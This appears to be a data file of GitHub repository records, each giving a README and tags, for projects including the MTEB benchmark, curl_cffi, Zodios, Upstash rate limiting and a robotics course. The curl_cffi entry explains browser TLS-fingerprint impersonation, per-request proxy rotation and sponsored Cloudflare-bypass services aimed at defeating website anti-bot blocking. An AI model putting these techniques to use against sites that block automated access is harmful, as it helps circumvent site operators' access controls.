embeddings-benchmark/mteb;Massive Text Embedding Benchmark Installation | Usage | Leaderboard | Documentation | Citing

Installation

```bash
pip install mteb
```

Usage

Using a python script (see scripts/run_mteb_english.py and mteb/mtebscripts for more):

```python
import mteb
from sentence_transformers import SentenceTransformer

# Define the sentence-transformers model name
model_name = "average_word_embeddings_komninos"
# or directly from huggingface:
# model_name = "sentence-transformers/all-MiniLM-L6-v2"
model = SentenceTransformer(model_name)
tasks = mteb.get_tasks(tasks=["Banking77Classification"])
evaluation = mteb.MTEB(tasks=tasks)
results = evaluation.run(model, output_folder=f"results/{model_name}")
```

Using CLI

```bash
mteb available_tasks

mteb run -m sentence-transformers/all-MiniLM-L6-v2 \
    -t Banking77Classification \
    --verbosity 3

# if nothing is specified, it defaults to saving the results in the results/{model_name} folder
```

Using multiple GPUs in parallel can be done by simply providing a custom encode function that distributes the inputs across multiple GPUs, e.g. as done here or here.

Advanced Usage (click to unfold)

## Advanced Usage

### Dataset selection

Datasets can be selected by providing the list of datasets, but also

* by their task (e.g. "Clustering" or "Classification")

```python
tasks = mteb.get_tasks(task_types=["Clustering", "Retrieval"]) # Only select clustering and retrieval tasks
```

* by their categories, e.g. "s2s" (sentence to sentence) or "p2p" (paragraph to paragraph)

```python
tasks = mteb.get_tasks(categories=["s2s", "p2p"]) # Only select sentence2sentence and paragraph2paragraph datasets
```

* by their languages

```python
tasks = mteb.get_tasks(languages=["eng", "deu"]) # Only select datasets which contain "eng" or "deu" (iso 639-3 codes)
```

You can also specify which languages to load for multilingual/cross-lingual tasks like below:

```python
import mteb

tasks = [
    mteb.get_task("AmazonReviewsClassification", languages=["eng", "fra"]),
    mteb.get_task("BUCCBitextMining", languages=["deu"]), # all subsets containing "deu"
]

# or you can select specific huggingface subsets like this:
from mteb.tasks import AmazonReviewsClassification, BUCCBitextMining

evaluation = mteb.MTEB(tasks=[
    AmazonReviewsClassification(hf_subsets=["en", "fr"]), # Only load "en" and "fr" subsets of Amazon Reviews
    BUCCBitextMining(hf_subsets=["de-en"]), # Only load "de-en" subset of BUCC
])
# for an example of a HF subset see "Subset" in the dataset viewer at: https://huggingface.co/datasets/mteb/bucc-bitext-mining
```

There are also presets available for certain task collections, e.g. to select the 56 English datasets that form the "Overall MTEB English leaderboard":

```python
from mteb import MTEB_MAIN_EN
evaluation = mteb.MTEB(tasks=MTEB_MAIN_EN, task_langs=["en"])
```

### Evaluation split

You can evaluate only on `test` splits of all tasks by doing the following:

```python
evaluation.run(model, eval_splits=["test"])
```

Note that the public leaderboard uses the test splits for all datasets except MSMARCO, where the "dev" split is used.

### Using a custom model

Models should implement the following interface: an `encode` function that takes as input a list of sentences and returns a list of embeddings (embeddings can be `np.array`, `torch.tensor`, etc.). For inspiration, you can look at the [mteb/mtebscripts repo](https://github.com/embeddings-benchmark/mtebscripts) used for running diverse models via SLURM scripts for the paper.
```python
from typing import Any

import numpy as np
import torch
import mteb
from mteb import MTEB

class MyModel():
    def encode(
        self, sentences: list[str], **kwargs: Any
    ) -> torch.Tensor | np.ndarray:
        """Encodes the given sentences using the encoder.

        Args:
            sentences: The sentences to encode.
            **kwargs: Additional arguments to pass to the encoder.

        Returns:
            The encoded sentences.
        """
        pass

model = MyModel()
tasks = mteb.get_tasks(tasks=["Banking77Classification"])
evaluation = MTEB(tasks=tasks)
evaluation.run(model)
```

If you'd like to use different encoding functions for query and corpus when evaluating on Retrieval or Reranking tasks, you can add separate methods for `encode_queries` and `encode_corpus`. If these methods exist, they will be automatically used for those tasks. You can refer to the `DRESModel` at `mteb/evaluation/evaluators/RetrievalEvaluator.py` for an example of these functions.

```python
class MyModel():
    def encode_queries(self, queries: list[str], **kwargs) -> list[np.ndarray] | list[torch.Tensor]:
        """Returns a list of embeddings for the given sentences.

        Args:
            queries: List of sentences to encode

        Returns:
            List of embeddings for the given sentences
        """
        pass

    def encode_corpus(self, corpus: list[str] | list[dict[str, str]], **kwargs) -> list[np.ndarray] | list[torch.Tensor]:
        """Returns a list of embeddings for the given sentences.

        Args:
            corpus: List of sentences to encode or list of dictionaries with keys "title" and "text"

        Returns:
            List of embeddings for the given sentences
        """
        pass
```

### Evaluating on a custom dataset

To evaluate on a custom task, you can run the following code on your custom task. See [how to add a new task](docs/adding_a_dataset.md) for how to create a new task in MTEB.

```python
from mteb import MTEB
from mteb.abstasks.AbsTaskReranking import AbsTaskReranking
from sentence_transformers import SentenceTransformer

class MyCustomTask(AbsTaskReranking):
    ...

model = SentenceTransformer("average_word_embeddings_komninos")
evaluation = MTEB(tasks=[MyCustomTask()])
evaluation.run(model)
```

Documentation

| Documentation | |
| ------------------------------ | ---------------------- |
| 📋 Tasks | Overview of available tasks |
| 📈 Leaderboard | The interactive leaderboard of the benchmark |
| 🤖 Adding a model | Information related to how to submit a model to the leaderboard |
| 👩‍🔬 Reproducible workflows | Information related to how to reproduce and create reproducible workflows with MTEB |
| 👩‍💻 Adding a dataset | How to add a new task/dataset to MTEB |
| 👩‍💻 Adding a leaderboard tab | How to add a new leaderboard tab to MTEB |
| 🤝 Contributing | How to contribute to MTEB and set it up for development |
| 🌐 MMTEB | An open-source effort to extend MTEB to cover a broad set of languages |

Citing

MTEB was introduced in "MTEB: Massive Text Embedding Benchmark", feel free to cite:

```bibtex
@article{muennighoff2022mteb,
  doi = {10.48550/ARXIV.2210.07316},
  url = {https://arxiv.org/abs/2210.07316},
  author = {Muennighoff, Niklas and Tazi, Nouamane and Magne, Lo{\"\i}c and Reimers, Nils},
  title = {MTEB: Massive Text Embedding Benchmark},
  publisher = {arXiv},
  journal = {arXiv preprint arXiv:2210.07316},
  year = {2022}
}
```

You may also want to read and cite the amazing work that has extended MTEB & integrated new datasets:
- Shitao Xiao, Zheng Liu, Peitian Zhang, Niklas Muennighoff. "C-Pack: Packaged Resources To Advance General Chinese Embedding" arXiv 2023
- Michael Günther, Jackmin Ong, Isabelle Mohr, Alaeddine Abdessalem, Tanguy Abel, Mohammad Kalim Akram, Susana Guzman, Georgios Mastrapas, Saba Sturua, Bo Wang, Maximilian Werk, Nan Wang, Han Xiao.
" Jina Embeddings 2: 8192-Token General-Purpose Text Embeddings for Long Documents " arXiv 2023 - Silvan Wehrli, Bert Arnrich, Christopher Irrgang. " German Text Embedding Clustering Benchmark " arXiv 2024 - Orion Weller, Benjamin Chang, Sean MacAvaney, Kyle Lo, Arman Cohan, Benjamin Van Durme, Dawn Lawrie, Luca Soldaini. " FollowIR: Evaluating and Teaching Information Retrieval Models to Follow Instructions " arXiv 2024 - Dawei Zhu, Liang Wang, Nan Yang, Yifan Song, Wenhao Wu, Furu Wei, Sujian Li. " LongEmbed: Extending Embedding Models for Long Context Retrieval " arXiv 2024 - Kenneth Enevoldsen, Márton Kardos, Niklas Muennighoff, Kristoffer Laigaard Nielbo. " The Scandinavian Embedding Benchmarks: Comprehensive Assessment of Multilingual and Monolingual Text Embedding " arXiv 2024 For works that have used MTEB for benchmarking, you can find them on the leaderboard .;MTEB: Massive Text Embedding Benchmark;benchmark,clustering,information-retrieval,sentence-transformers,sts,text-embedding,retrieval,neural-search,semantic-search,sbert
embeddings-benchmark/mteb
siavash79/PixelXpert;For Pixel Stock Android 12 and 13 (Up to Nov 2022 - AOSP 13R8): For Pixel Stock Android 13 and 14 (starting with Dec 2022 security patch): PixelXpert Support Channels:

This is a mixed Xposed+Magisk module, which is made to allow customizations that are not originally designed in AOSP (Android Open Source Project). Please read through the sections below before heading to the download links.

Features: Currently, PixelXpert offers customizations on different aspects of the system framework and SystemUI, including: - Status bar - Quick Settings panel - Lock screen - Notifications - Gesture Navigations - Phone & Dialer - Hotspot - Package Manager - Screen properties

Compatibility: PixelXpert is only fully compatible with Pixel stock firmware. Custom ROMs are not tested and may not be fully (or even at all) compatible. Here is the compatibility chart according to different Android versions and QPRs: Android 12/12.1: final version: v2.4.1. Android 13 stable QPR1 (up until November 2022 firmware): final version: v2.4.1. Android 13 stable QPR3 (starting from December 2022 firmware till QPR3): starting with v2.5 up until the latest stable/canary versions. Android 14: starting with v2.9 up until the latest stable/canary versions. Android 14 QPR2 beta builds are not yet fully compatible. Please be patient until we iron out the incompatibilities caused by code changes in source (source code is not available for QPR betas).

Prerequisites: Compatible ROM (see Compatibility above) Device rooted with Magisk 24.2+ or KSU LSPosed (Zygisk version preferred)

How to install: Download the stable Magisk module according to your firmware as mentioned above Install in Magisk/KSU Reboot (no bootloops are expected) Open the PixelXpert app and apply changes P.S. For KSU, there is an extra step of granting root access to PixelXpert, as it isn't requested automatically as in Magisk

Release Variants: The module is released in 2 flavors with different manual download and update procedures. Both can utilize automated updates through the Magisk manager, or through the in-app updater (for canary, updates will not count against the module's download count). Stable release: - Manual Install/Update: through the repository's GitHub release page (link below) AND through the in-app updater Canary release: - Manual Install/Update: through the repository's Actions page and Telegram channel (the latest version is also available from here) *No matter which flavor you're on, you can always switch to the other one with the in-app updater

Translations: Want to help translate PixelXpert into your language? Visit Crowdin

Donations: This project is open source and free to use, build or copy. However, if you really feel like it, you can donate to your favorite charity on our behalf, or help fund education for children in need, at Child Foundation

Credits / Thanks: Android Team @topjohnwu for Magisk @rovo89 for Xposed Team LSPosed apsun@github for remote-preferences @nijel8 for double-tap to wake UI design: - @Mahmud0808 Graphic design: - JstormZx@Telegram (Icon and Banner) - RKBDI@Telegram (Icon) Brought to you by: @siavash79 & @ElTifo;mixed Xposed+Magisk module for customization of Google Pixel rom of Android 12+;customization,magisk-module,xposed-module
siavash79/PixelXpert
yifeikong/curl_cffi;curl_cffi Documentation | 中文 README

Python binding for curl-impersonate via cffi. Unlike other pure Python http clients like httpx or requests, curl_cffi can impersonate browsers' TLS/JA3 and HTTP/2 fingerprints. If you are blocked by some website for no obvious reason, you can give curl_cffi a try.

Scrapfly is an enterprise-grade solution providing a Web Scraping API that aims to simplify the scraping process by managing everything: real browser rendering, rotating proxies, and fingerprints (TLS, HTTP, browser) to bypass all major anti-bots. Scrapfly also unlocks observability by providing an analytical dashboard and measuring the success rate/block rate in detail. Scrapfly is a good solution if you are looking for a cloud-managed solution for curl_cffi. If you are managing TLS/HTTP fingerprints by yourself with curl_cffi, they also maintain a curl to Python converter.

Features
- Supports JA3/TLS and http2 fingerprint impersonation.
- Much faster than requests/httpx, on par with aiohttp/pycurl, see benchmarks.
- Mimics the requests API, no need to learn another one.
- Pre-compiled, so you don't have to compile on your machine.
- Supports asyncio with proxy rotation on each request.
- Supports http 2.0, which requests does not.
- Supports websocket.

| | requests | aiohttp | httpx | pycurl | curl_cffi |
|---|---|---|---|---|---|
| http2 | ❌ | ❌ | ✅ | ✅ | ✅ |
| sync | ✅ | ❌ | ✅ | ✅ | ✅ |
| async | ❌ | ✅ | ✅ | ❌ | ✅ |
| websocket | ❌ | ✅ | ❌ | ❌ | ✅ |
| fingerprints | ❌ | ❌ | ❌ | ❌ | ✅ |
| speed | 🐇 | 🐇🐇 | 🐇 | 🐇🐇 | 🐇🐇 |

Install

```
pip install curl_cffi --upgrade
```

This should work on Linux, macOS and Windows out of the box. If it does not work on your platform, you may need to compile and install curl-impersonate first and set some environment variables like LD_LIBRARY_PATH.

To install beta releases:

```
pip install curl_cffi --upgrade --pre
```

To install the unstable version from GitHub:

```
git clone https://github.com/yifeikong/curl_cffi/
cd curl_cffi
make preprocess
pip install .
```

Usage

curl_cffi comes with a low-level curl API and a high-level requests-like API. Use the latest impersonate versions; do NOT blindly copy chrome110 here without checking.

requests-like

```python
from curl_cffi import requests

# Notice the impersonate parameter
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110")

print(r.json())
# output: {..., "ja3n_hash": "aa56c057ad164ec4fdcb7a5a283be9fc", ...}
# the ja3n fingerprint should be the same as the target browser

# To keep using the latest browser version as curl_cffi updates,
# simply set impersonate="chrome" without specifying a version.
# Other similar values are: "safari" and "safari_ios"
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome")

# http/socks proxies are supported
proxies = {"https": "http://localhost:3128"}
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies)

proxies = {"https": "socks://localhost:3128"}
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies)
```

Sessions

```python
s = requests.Session()

# httpbin is a http test website, this endpoint makes the server set cookies
s.get("https://httpbin.org/cookies/set/foo/bar")
print(s.cookies)
# <Cookies[<Cookie foo=bar for httpbin.org />]>

# retrieve cookies again to verify
r = s.get("https://httpbin.org/cookies")
print(r.json())
# {'cookies': {'foo': 'bar'}}
```

Supported impersonate versions, as supported by my fork of curl-impersonate. However, only Chrome-like browsers are supported. Firefox support is tracked in #59. Browser versions will be added only when their fingerprints change. If you see that a version, e.g. chrome122, was skipped, you can simply impersonate it with your own headers and the previous version.

- chrome99, chrome100, chrome101, chrome104, chrome107, chrome110, chrome116 [1], chrome119 [1], chrome120 [1], chrome123 [3], chrome124 [3], chrome99_android
- edge99, edge101
- safari15_3 [2], safari15_5 [2], safari17_0 [1], safari17_2_ios [1]

Notes: 1. Added in version 0.6.0. 2. Fixed in version 0.6.0; previous http2 fingerprints were not correct. 3. Added in version 0.7.0.

asyncio

```python
from curl_cffi.requests import AsyncSession

async with AsyncSession() as s:
    r = await s.get("https://example.com")
```

More concurrency:

```python
import asyncio
from curl_cffi.requests import AsyncSession

urls = [
    "https://google.com/",
    "https://facebook.com/",
    "https://twitter.com/",
]

async with AsyncSession() as s:
    tasks = []
    for url in urls:
        task = s.get(url)
        tasks.append(task)
    results = await asyncio.gather(*tasks)
```

WebSockets

```python
from curl_cffi.requests import Session, WebSocket

def on_message(ws: WebSocket, message):
    print(message)

with Session() as s:
    ws = s.ws_connect(
        "wss://api.gemini.com/v1/marketdata/BTCUSD",
        on_message=on_message,
    )
    ws.run_forever()
```

For low-level APIs, Scrapy integration and other advanced topics, see the docs for more details.

Acknowledgement: Originally forked from multippt/python_curl_cffi, which is under the MIT license. Headers/Cookies files are copied from httpx, which is under the BSD license. Asyncio support is inspired by Tornado's curl http client. The WebSocket API is inspired by websocket_client.

[Sponsor] Bypass Cloudflare with API: Yescaptcha is a proxy service that bypasses Cloudflare and uses the API interface to obtain verified cookies (e.g. cf_clearance). Click here to register: https://yescaptcha.com/i/stfnIO

[Sponsor] ScrapeNinja: ScrapeNinja is a web scraping API with two engines: one fast, with high performance and TLS fingerprinting; and one slower, with a real browser under the hood. ScrapeNinja handles headless browsers, proxies, timeouts, retries, and helps with data extraction, so you can just get the data in JSON. Rotating proxies are available out of the box on all subscription plans.

Citation: If you find this project useful, please cite it as below:

```
@software{Kong2023,
  author = {Yifei Kong},
  title = {curl_cffi - A Python HTTP client for impersonating browser TLS and HTTP/2 fingerprints},
  year = {2023},
  publisher = {GitHub},
  journal = {GitHub repository},
  url = {https://github.com/yifeikong/curl_cffi},
}
```
;Python binding for curl-impersonate via cffi. A http client that can impersonate browser tls/ja3/http2 fingerprints.;curl,http-client,curl-impersonate,http,https,ja3,ja3-fingerprint,tls-fingerprint,fingerprinting,web-scraping
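The feature list above advertises asyncio with proxy rotation on each request; here is a hedged sketch of one way to do that (the proxy endpoints are placeholders, and passing proxies per request is assumed to follow the requests-like API shown above):

```python
import asyncio
from curl_cffi.requests import AsyncSession

# placeholder proxy pool; replace with real endpoints
PROXIES = ["http://proxy1:3128", "http://proxy2:3128"]

async def fetch_all(urls):
    async with AsyncSession() as s:
        tasks = [
            # rotate: a different proxy for each request
            s.get(url, impersonate="chrome",
                  proxies={"https": PROXIES[i % len(PROXIES)]})
            for i, url in enumerate(urls)
        ]
        return await asyncio.gather(*tasks)

results = asyncio.run(fetch_all(["https://example.com", "https://example.org"]))
```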
yifeikong/curl_cffi
ecyrbe/zodios;Zodios

Zodios is a typescript api client and an optional api server with auto-completion features, backed by axios, zod and express. Documentation https://user-images.githubusercontent.com/633115/185851987-554f5686-cb78-4096-8ff5-c8d61b645608.mp4

What is it? It's an axios-compatible API client and an optional expressJS-compatible API server with the following features:
- really simple centralized API declaration
- typescript autocompletion in your favorite IDE for URL and parameters
- typescript response types
- parameters and responses schema thanks to zod
- response schema validation
- powerful plugins like the fetch adapter or automatic auth injection
- all axios features available
- @tanstack/query wrappers for react and solid (vue, svelte, etc. soon)
- all expressJS features available (middlewares, etc.)

Table of contents: What is it? Install (Client and api definitions; Server) How to use it on client side? Declare your API with zodios API definition format Full documentation Ecosystem Roadmap Dependencies

Install

Client and api definitions:

```bash
npm install @zodios/core
```

or

```bash
yarn add @zodios/core
```

Server:

```bash
npm install @zodios/core @zodios/express
```

or

```bash
yarn add @zodios/core @zodios/express
```

How to use it on client side? For an almost complete example of how to use zodios and how to split your API declarations, take a look at the dev.to example.

Declare your API with zodios. Here is an example of API declaration with Zodios:

```typescript
import { Zodios } from "@zodios/core";
import { z } from "zod";

const apiClient = new Zodios(
  "https://jsonplaceholder.typicode.com",
  // API definition
  [
    {
      method: "get",
      path: "/users/:id", // auto detect :id and ask for it in apiClient get params
      alias: "getUser", // optional alias to call this endpoint with it
      description: "Get a user",
      response: z.object({
        id: z.number(),
        name: z.string(),
      }),
    },
  ],
);
```

Calling this API is now easy and has builtin autocomplete features:

```typescript
//   typed          auto-complete path     auto-complete params
//     ▼                    ▼                       ▼
const user = await apiClient.get("/users/:id", { params: { id: 7 } });
console.log(user);
```

It should output:

```js
{ id: 7, name: 'Kurtis Weissnat' }
```

You can also use aliases:

```typescript
//   typed     alias auto-complete    auto-complete params
//     ▼              ▼                       ▼
const user = await apiClient.getUser({ params: { id: 7 } });
console.log(user);
```

API definition format:

```typescript
type ZodiosEndpointDescriptions = Array<{
  method: 'get' | 'post' | 'put' | 'patch' | 'delete';
  path: string; // example: /posts/:postId/comments/:commentId
  alias?: string; // example: getPostComments
  immutable?: boolean; // flag a post request as immutable to allow it to be cached with react-query
  description?: string;
  requestFormat?: 'json' | 'form-data' | 'form-url' | 'binary' | 'text'; // default to json if not set
  parameters?: Array<{
    name: string;
    description?: string;
    type: 'Path' | 'Query' | 'Body' | 'Header';
    schema: ZodSchema; // you can use zod `transform` to transform the value of the parameter before sending it to the server
  }>;
  response: ZodSchema; // you can use zod `transform` to transform the value of the response before returning it
  status?: number; // default to 200, you can use this to override the success status code of the response (only useful for openapi and express)
  responseDescription?: string; // optional response description of the endpoint
  errors?: Array<{
    status: number | 'default';
    description?: string;
    schema: ZodSchema; // transformations are not supported on error schemas
  }>;
}>;
```

Full documentation: Check out the full documentation or the following shortcuts: API definition, Http client, React hooks, Solid hooks, API server, Nextjs integration.

Ecosystem:
- openapi-zod-client: generate a zodios client from an openapi specification
- @zodios/express: full end-to-end type safety like tRPC, but for REST APIs
- @zodios/plugins: some plugins for zodios
- @zodios/react: a react-query wrapper for zodios
- @zodios/solid: a solid-query wrapper for zodios

Roadmap for v11:
- Type providers for Zod / Io-Ts: By using the TypeProvider pattern we can now make zodios validation agnostic. Implement at least ZodTypeProvider and IoTsTypeProvider since they both support input and output type inference. openapi generation will only be compatible with zod, though. Not a breaking change, so no codemod needed.
- [x] MonoRepo: Zodios will become a really large project, so maybe migrate to turbo repo + pnpm. Not a breaking change.
- [ ] Transform: By default, activate transforms on the backend and disable them on the frontend (today it's the opposite); this would make server transform code simpler, since with this option we could activate any transforms, not just the zod defaults. The rationale being that transformation can be viewed as business code that should be kept on the backend. Breaking change => codemod to keep current defaults by setting them explicitly.
- [x] Axios: Move the Axios client to its own package @zodios/axios and keep @zodios/core with only common types and helpers. Move plugins to @zodios/axios-plugins. Breaking change => easy to do a codemod for this.
- [x] Fetch: Create a new Fetch client with almost the same features as axios, but without the axios dependency: @zodios/fetch. Today we have fetch support with a plugin for the axios instance (zodios maintains its own axios network adapter for fetch). But since axios interceptors are not used by zodios plugins, we can make the fetch implementation lighter than an axios instance. Create a plugins package @zodios/fetch-plugins. Not sure it's doable without a lot of effort to keep it in sync/compatible with the axios client. New feature, so no codemod needed.
- [ ] React/Solid: make ZodiosHooks independent of the Zodios client instance (axios, fetch). Not a breaking change, so no codemod needed.
- [x] Client Request Config: uniform Query/Mutation with the body sent in the config and not as a standalone object. This would allow us to not do client.deleteUser(undefined, { params: { id: 1 } }) but simply client.deleteUser({ params: { id: 1 } }). Breaking change, so a codemod would be needed, but might be difficult to implement.
- [x] Mock/Tests: if we implement an abstraction layer for the client instance, relying on moxios to mock API responses will likely not work for the fetch implementation. Create a @zodios/testing package that works for both axios/fetch clients. New feature, so no breaking change (no codemod needed).

You have other ideas? Let me know!

Dependencies: Even when working in pure JavaScript, Zodios is better suited to working with a TypeScript Language Server to handle autocompletion, so you should at least use the one provided by your IDE (vscode integrates a typescript language server). However, we will only support fixing bugs related to typings for versions of the TypeScript Language Server from v4.5. Earlier versions should work, but do not have the TS tail recursion optimization that impacts the size of the API you can declare. Also note that Zodios does not embed any dependencies. It's your job to install the peer dependencies you need. Internally Zodios uses these libraries on all platforms: zod, axios.;typescript http client and server with zod validation;zod,http,typescript,api,nodejs,openapi,rest
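Building on the API definition format above, here is an illustrative sketch (not from the original README; the endpoint, base URL and schemas are made up) of a POST endpoint combining a Body parameter, an alias and a declared error schema:

```typescript
import { Zodios } from "@zodios/core";
import { z } from "zod";

const userApi = new Zodios("https://example.com/api", [
  {
    method: "post",
    path: "/users",
    alias: "createUser",
    parameters: [
      {
        name: "body",
        type: "Body",
        schema: z.object({ name: z.string() }), // request body validated by zod
      },
    ],
    response: z.object({ id: z.number(), name: z.string() }),
    errors: [
      {
        status: 409,
        description: "User already exists",
        schema: z.object({ message: z.string() }),
      },
    ],
  },
]);

// With a Body parameter, the body is passed as the first argument of the alias.
const user = await userApi.createUser({ name: "John Doe" });
```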
ecyrbe/zodios
michiganrobotics/rob501;Robotics 501: Mathematics for Robotics

ROB 501: Mathematics for Robotics is a graduate-level course at the University of Michigan that introduces applied mathematics for robotics engineers. Topics include vector spaces, orthogonal bases, projection theorem, least squares, matrix factorizations, Kalman filter and underlying probabilistic concepts, norms, convergent sequences, contraction mappings, Newton-Raphson algorithm, local vs global convergence in nonlinear optimization, convexity, linear and quadratic programs. This offering of the course is from Fall 2018.

Prerequisites: It is assumed that students know basic matrix algebra, such as how to multiply and invert matrices, what the rank of a matrix is, and how to compute eigenvectors; know how to compute means and variances given the density of a continuous random variable, and what conditional probability is and how to compute it; know vector calculus and will review how to compute gradients of functions and what the method of Lagrange multipliers is; know simple properties of complex numbers; and know how to use MATLAB, including plotting, various types of multiplication, such as * vs .* (star vs dot star), writing a for loop, or finding help.

Lecture Videos, Textbook & Notes: All lecture videos are available on YouTube: ROB 501 Fall 2018 videos. Also, the textbook, lecture notes and handouts are available.

Recitations: Recitation questions and answers are both available.

Course Plan

| Lecture | Topic | YouTube | Assignments Due |
|---------|-------|---------|-----------------|
| 1 | Intro & Proofs | Video | |
| 2 | Induction, Fundamental Theorem, & Contradiction | Video | |
| 3 | Abstract Linear Algebra | Video | |
| 4 | Subspaces & Linear Independence | Video | Homework 1 |
| 5 | Basis Vectors & Dimension | Video | |
| 6 | Linear Operators & Eigenvalues | Video | Homework 2 |
| 7 | Similar Matrices & Norms | Video | |
| 8 | Inner Product Spaces | Video | Homework 3 |
| 9 | Projection Theorem & Gram-Schmidt | Video | |
| 10 | Normal Equations & Least Squares | Video | Homework 4 |
| 11 | Symmetric & Orthogonal Matrices | Video | |
| 12 | Positive Semi-Definite Matrices & Schur Complement Theorem | Video | Homework 5 |
| 13 | Recursive Least Squares & Kalman Filter | Video | |
| 14 | Least Squares & Probability | Video | |
| 15 | Best Linear Unbiased Estimator | Video | Homework 6 |
| 16 | QR Factorization | Video | Exam 1 |
| 17 | Modified Gram-Schmidt & Minimum Variance Estimator | Video | |
| 18 | Probability Space & Random Variables | Video | |
| 19 | Gaussian Random Vectors | Video | Homework 7 |
| 20 | Real Analysis & Normed Spaces | Video | |
| 21 | Real Analysis & Interior of a Set | Video | Homework 8 |
| 22 | Newton-Raphson Algorithm | Video | |
| 23 | Cauchy Sequences | Video | Homework 9 |
| 24 | Continuous Functions | Video | |
| 25 | Weierstrass Theorem | Video | |
| 26 | Final Class & Linear Programming | Video | Homework 10 & Exam 2 |

A more detailed course plan is available.

Credits: Jessy Grizzle, Director, Michigan Robotics; Nils Smit-Anseeuw

License: All code is licensed under the GNU General Public License v3.0. All other content, including textbooks, homeworks, and video, is licensed under the Creative Commons Attribution-NonCommercial 4.0 (CC BY-NC 4.0).

For more: University of Michigan Robotics | Michigan Robotics Twitter | Michigan Robotics Instagram;Mathematics for Robotics;[]
michiganrobotics/rob501
bullet-train-co/bullet_train;Bullet Train Application Template

If you're new to Bullet Train, start with the Bullet Train Developer Documentation and the Getting Started guide. You should also join the community Discord server!

Building a New Application with Bullet Train: If you're building a new application with Bullet Train, you don't want to "Fork" the template repository on GitHub. Instead, you should:

1. Clone the template repository: git clone git@github.com:bullet-train-co/bullet_train.git your_new_project_name
2. Enter the project directory: cd your_new_project_name
3. Run the configuration and setup scripts: bin/configure bin/setup
4. Boot your application: bin/dev
5. Visit http://localhost:3000.

Cloud Development with Gitpod: Clicking this button will set up a new Bullet Train project for development on Gitpod. Open-source development sponsored by:

Provisioning a Production Environment: You can use this public repository to provision a new application and then push your private application code there later.

Render: Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure for your Bullet Train application, which will cost about $30/month. When you're done deploying to Render, you need to go into "Dashboard" > "web", copy the server URL, and then go into "Env Groups" > "settings" and paste the URL into the value for BASE_URL.

Heroku: Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure and services for your Bullet Train application, which will cost about $140/month. Once that process has completed, be sure to complete the other steps from the Deploying to Heroku documentation.

Contribute to Bullet Train: If you're looking to contribute to Bullet Train, you should "Fork" this template repository on GitHub, like so:

1. Visit https://github.com/bullet-train-co/bullet_train.
2. Click "Fork" in the top-right corner.
3. Select the account where you want to fork the repository.
4. Click the "Code" button on the new repository and copy the SSH path.
5. Clone your forked repository using the SSH path you copied: git clone git@github.com:your-account/bullet_train.git cd bullet_train
6. Run the setup script: bin/setup
7. Start the application: bin/dev

[!NOTE] Optional: If you have ngrok installed, uncomment ngrok: ngrok http 3000 from Procfile.dev and run bin/set-ngrok-url to set BASE_URL to a publicly accessible domain. Run bin/set-ngrok-url after restarting ngrok to update BASE_URL to the current public URL.

Visit http://localhost:3000.

This README.md file will be replaced with README.example.md after running bin/configure.;The Open Source Ruby on Rails SaaS Template;rails,saas,bullet-train
bullet-train-co/bullet_train
upstash/ratelimit-js;Upstash Rate Limit

[!NOTE] This project is in GA Stage. The Upstash Professional Support fully covers this project. It receives regular updates and bug fixes. The Upstash team is committed to maintaining and improving its functionality.

It is the only connectionless (HTTP based) rate limiting library and is designed for:
- Serverless functions (AWS Lambda, Vercel ....)
- Cloudflare Workers & Pages
- Vercel Edge
- Fastly Compute@Edge
- Next.js, Jamstack ...
- Client side web/mobile applications
- WebAssembly and other environments where HTTP is preferred over TCP.

Quick Start

Install

npm:

```bash
npm install @upstash/ratelimit
```

Deno:

```ts
import { Ratelimit } from "https://cdn.skypack.dev/@upstash/ratelimit@latest";
```

Create database: Create a new redis database on upstash. See here for documentation on how to create a redis instance.

Basic Usage:

```ts
import { Ratelimit } from "@upstash/ratelimit"; // for deno: see above
import { Redis } from "@upstash/redis"; // see below for cloudflare and fastly adapters

// Create a new ratelimiter, that allows 10 requests per 10 seconds
const ratelimit = new Ratelimit({
  redis: Redis.fromEnv(),
  limiter: Ratelimit.slidingWindow(10, "10 s"),
  analytics: true,
  /*
   * Optional prefix for the keys used in redis. This is useful if you want to share a redis
   * instance with other applications and want to avoid key collisions. The default prefix is
   * "@upstash/ratelimit"
   */
  prefix: "@upstash/ratelimit",
});

// Use a constant string to limit all requests with a single ratelimit
// Or use a userID, apiKey or ip address for individual limits.
const identifier = "api";
const { success } = await ratelimit.limit(identifier);

if (!success) {
  return "Unable to process at this time";
}
doExpensiveCalculation();
return "Here you go!";
```

For more information on getting started, you can refer to our documentation. Here's a complete nextjs example.

Documentation: See the documentation for more details about this package.

Contributing

Database: Create a new redis database on upstash and copy the url and token.

Running tests: To run the tests, you will need to set some environment variables. Here is a list of variables to set:
- UPSTASH_REDIS_REST_URL
- UPSTASH_REDIS_REST_TOKEN
- US1_UPSTASH_REDIS_REST_URL
- US1_UPSTASH_REDIS_REST_TOKEN
- APN_UPSTASH_REDIS_REST_URL
- APN_UPSTASH_REDIS_REST_TOKEN
- EU2_UPSTASH_REDIS_REST_URL
- EU2_UPSTASH_REDIS_REST_TOKEN

You can create a single Upstash Redis and use its URL and token for all four above. Once you set the environment variables, simply run:

```sh
pnpm test
```
;Rate limiting library for serverless runtimes;rate-limiting,redis,serverless,upstash,upstash-ratelimit,upstash-sdk
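To show how the `success` flag above typically feeds an HTTP response, here is a hedged sketch of a request handler; the handler shape, the identifier choice and the header names are illustrative, not part of the library:

```ts
import { Ratelimit } from "@upstash/ratelimit";
import { Redis } from "@upstash/redis";

const ratelimit = new Ratelimit({
  redis: Redis.fromEnv(),
  limiter: Ratelimit.slidingWindow(10, "10 s"),
});

export default async function handler(request: Request): Promise<Response> {
  // Illustrative: key the limit on the caller's IP when available.
  const identifier = request.headers.get("x-forwarded-for") ?? "anonymous";
  const { success, limit, remaining, reset } = await ratelimit.limit(identifier);

  if (!success) {
    // 429 with rate limit headers so well-behaved clients can back off.
    return new Response("Too many requests", {
      status: 429,
      headers: {
        "X-RateLimit-Limit": String(limit),
        "X-RateLimit-Remaining": String(remaining),
        "X-RateLimit-Reset": String(reset),
      },
    });
  }
  return new Response("Here you go!");
}
```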
upstash/ratelimit-js
PeterStrick/ViVeTool-GUI;ViVeTool GUI Windows Feature Control GUI based on ViVeTool

